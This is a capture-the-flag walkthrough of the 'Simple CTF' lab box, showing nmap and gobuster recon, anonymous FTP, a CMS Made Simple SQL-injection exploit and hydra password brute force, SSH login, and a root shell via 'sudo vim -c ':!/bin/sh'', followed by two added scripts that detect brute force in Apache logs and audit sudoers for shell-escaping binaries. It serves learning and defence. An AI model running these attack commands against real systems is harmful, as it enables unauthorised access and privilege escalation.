# Simple CTF

![](/files/-MajV3ZM7FLoQLE3SLaL)

## Reconnaissance

Let's start with an initial nmap scan to find open ports.

```
nmap -Pn 10.10.221.224
```

![](/files/-MajVYmfwpjY48WPhlkM)

Detailed nmap scan:

Command breakdown:

* **-sV**: Service version detection
* **-sC**: Default nmap scripts
* **-p**: Specifying ports 21,80,2222
* **-oN nmap**: Saving the output to a file called nmap

```
nmap -sC -sV -p 21,80,2222 -oN nmap 10.10.221.224
```

![](/files/-MajWLp6S42VEc9pIHH-)

With this information we can answer the first 2 questions.

![](/files/-MajWZGEpTd-5rUeqcm0)

## Enumeration

### Port 21

Let's start by enumerating FTP (port 21), since anonymous login is allowed.

```
ftp 10.10.221.224
```

![](/files/-MajXAaniHyIOaybPbOl)

After listing the contents, we can see that there is a directory called `pub` and inside it a file called `ForMitch.txt`. Let's transfer it to our machine using the `get` command.

```
get ForMitch.txt
```

![](/files/-MajXbcxv2N5u2aPWsFe)

Reading the file we transferred tells us that Mitch set the password for the system user, and that the password is weak.

```
cat ForMitch.txt
```

![](/files/-MajY8pHNOuHcQAxgjsp)

### Port 80

Let's visit the website.

![](/files/-MajYelbyS4MT1UDj-7q)

It's the default Apache2 Ubuntu page, so let's visit robots.txt, since our nmap scan showed an entry of interest there.

![](/files/-MajYyEebxA7K8hHbhIs)

We can see that there is a directory called `/openemr-5_0_1_3`, so let's visit it.

![](/files/-MajZFg04t4lrN0SnkOw)

It is not found, so let's try finding hidden directories with a tool called **`Gobuster`**.

Command breakdown:

* **-w**: Specifying the wordlist
* **-u**: Specifying the URL

```
gobuster dir -w /usr/share/wordlists/dirbuster/common.txt -u http://10.10.221.224
```

![](/files/-Maj_JJ5-4p1YRTc-uNl)

The directory called `/simple` looks interesting, so let's visit it.

![](/files/-Maj_T1c8SlM3ijczgCD)

It's a CMS Made Simple application, and scrolling down a bit we can see its version.

![](/files/-Maj_hasZ0yeDGBEyoxe)

Let's look for exploits for it using searchsploit.

```
searchsploit cms made simple 2.2.8
```

![](/files/-Maj_vwisAEdZywjUuID)

It looks like a SQL injection exploit; let's use it against this machine.

## Exploitation

Searching for it on exploit-db gives us the answers to questions 3 and 4.

![](/files/-MajaTHZGuDd338PXd27)

![](/files/-Maja_d-6MR0zd85Lxgz)

Let's download the exploit.

```
searchsploit -m php/webapps/46635.py
```

![](/files/-MajaiykBm1gqPgZKYpq)

Now let's launch it against the server, but first we need to make some changes to the script, since we are going to run this exploit with python3. First we need to add parentheses around the print statements.

Before:

![](/files/-MajbeyEYPgN0AYpJXqZ)

After:

![](/files/-MajcPZQKK2ubA0cZz23)

Before:

![](/files/-MajcY1L2593FSitO0Ut)

After:

![](/files/-MajcdSs6gvZNYVxPA8H)

Before:

![](/files/-MajclNpXs5CpYX5Zqwb)

After:

![](/files/-MajcrKRowka5LdXrR2B)

Now we can run the exploit with its options: the target URL (-u), a wordlist to crack the password (-w) and the flag that tells the exploit to crack the password (-c), all documented in the exploit.

![](/files/-MajdMHsZHeYVamj56Nk)

```
python3 46635.py -u http://10.10.221.224/simple -w /usr/share/wordlists/rockyou.txt -c
```

![](/files/-Maji1qcg9I94k8dWiat)

We found the password: `secret`. Sometimes this exploit does not work, so we can also try cracking the password with hydra.

```
hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.221.224 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"
```

![](/files/-MajjP1bAr6ZYLzBoJQe)
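Both the gobuster run in the Port 80 section and this hydra run leave a characteristic trail in the web server's access log. The following detection script is an added example, not part of the original writeup or of any tool it uses: it parses Apache combined-format log lines and flags an IP that produces a burst of 404s (directory brute forcing) or a burst of POSTs to the CMS login form (password brute forcing). The sample log lines, IPs, user agents and thresholds are constructed.

```python
import re
from collections import Counter

# Apache "combined" access-log format, the default on an Ubuntu apache2 install.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATH = "/simple/admin/login.php"  # the form hydra targeted above


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines, scan_threshold=20, login_threshold=10):
    """Flag IPs that look like a directory brute force (many 404s) or a login brute
    force (many POSTs to the admin login form). Thresholds are assumptions; tune them."""
    not_found, login_posts = Counter(), Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash on a malformed entry
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        if rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            login_posts[rec["ip"]] += 1
    return {
        "dir_scan": sorted(ip for ip, n in not_found.items() if n >= scan_threshold),
        "login_bruteforce": sorted(ip for ip, n in login_posts.items() if n >= login_threshold),
    }


def _line(ip, method, path, status, ua):
    return f'{ip} - - [01/Jan/2021:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample log: one host scanning for directories, then hammering the CMS
# login form, plus an ordinary visitor. IPs and user agents are made up.
SAMPLE_LOG = (
    [_line("10.9.1.50", "GET", f"/dir{i}", 404, "gobuster/3.1.0") for i in range(25)]
    + [_line("10.9.1.50", "POST", LOGIN_PATH, 200, "Mozilla/5.0 (Hydra)") for _ in range(30)]
    + [_line("10.9.1.77", "GET", p, 200, "Mozilla/5.0") for p in ("/", "/robots.txt", "/simple/")]
)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))  # {'dir_scan': ['10.9.1.50'], 'login_bruteforce': ['10.9.1.50']}
```

On a real host, feed it `/var/log/apache2/access.log` line by line; rate limiting or fail2ban on the login form is the matching mitigation.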

And now we can ssh into the machine using these credentials.

```
ssh mitch@10.10.221.224 -p 2222
```

![](/files/-Majk30cs2c0ZYleA_eo)

## Privilege Escalation

For privilege escalation, one of the first commands we use is `sudo -l`, which tells us what we are allowed to run on the machine.

```
sudo -l
```

![](/files/-MajknmqauQRjtyzOYiS)

We are allowed to run /usr/bin/vim as root, so we can visit [GTFOBins](https://gtfobins.github.io/), a site that lists commands for escalating privileges through such binaries.

Search for vim on the site and look at the sudo section, since we are allowed to run /usr/bin/vim as root.

After you run the first command, you are root.

![](/files/-MajlnM3_hr-GR754jYk)

```
sudo vim -c ':!/bin/sh'
```

![](/files/-MajluZmhcO-eb7TgeR9)
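From the defender's side, the sudo rule that made this escalation possible is easy to spot before anyone abuses it. The following audit script is an added example, not part of the writeup or of GTFOBins: it parses sudoers-style rules and flags any that let a non-root user run, as root, a binary known to break out into a shell. The sample sudoers content, the NOPASSWD tag on the mitch rule and the list of shell-escaping binaries are assumptions.

```python
import re

# Binaries that hand over a root shell when allowed under sudo, because they can run
# shell commands or write arbitrary files (the vim -c ':!/bin/sh' trick above is one
# instance). Assumed list drawn from the GTFOBins "sudo" category; extend as needed.
SHELL_ESCAPE_BINS = {"vim", "vi", "nano", "less", "more", "man", "awk", "find",
                     "python", "python3", "perl", "env", "bash", "sh", "tee"}

# One sudoers rule, e.g. "mitch ALL=(root) NOPASSWD: /usr/bin/vim"; the (runas) part is optional.
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)


def audit_rule(rule):
    """Return a finding for a rule that lets a non-root user reach root, else None."""
    m = RULE_RE.match(rule.strip())
    if not m or m.group("user") == "root":
        return None
    runas = (m.group("runas") or "root").split(":")[0].strip()  # no (...) means root
    if runas not in ("root", "ALL"):
        return None
    risky = []
    for cmd in m.group("cmds").split(","):
        parts = cmd.split()
        if parts and (parts[0] == "ALL" or parts[0].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS):
            risky.append(cmd.strip())
    if not risky:
        return None
    severity = "critical" if "NOPASSWD" in m.group("tags") else "high"
    return {"user": m.group("user"), "commands": risky, "severity": severity}


def audit_sudoers(lines):
    """Audit a sudoers file; blank lines, comments, Defaults and aliases are skipped."""
    rules = (ln.strip() for ln in lines)
    rules = (r for r in rules if r and not r.startswith(("#", "Defaults")) and "_Alias" not in r)
    return [f for f in map(audit_rule, rules) if f]


# Constructed sample sudoers; the mitch line mirrors the vim rule sudo -l revealed on this
# box (whether it carries NOPASSWD is an assumption).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
mitch ALL=(root) NOPASSWD: /usr/bin/vim
backup ALL=(root) /usr/bin/rsync, /usr/bin/tee
www-data ALL=(www-data) /usr/bin/vim
""".splitlines()
```

Running `audit_sudoers(SAMPLE_SUDOERS)` reports mitch as critical and backup (via tee) as high; the fix is to drop the rule or replace the editor with `sudoedit`, which never hands the user an interactive root process.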

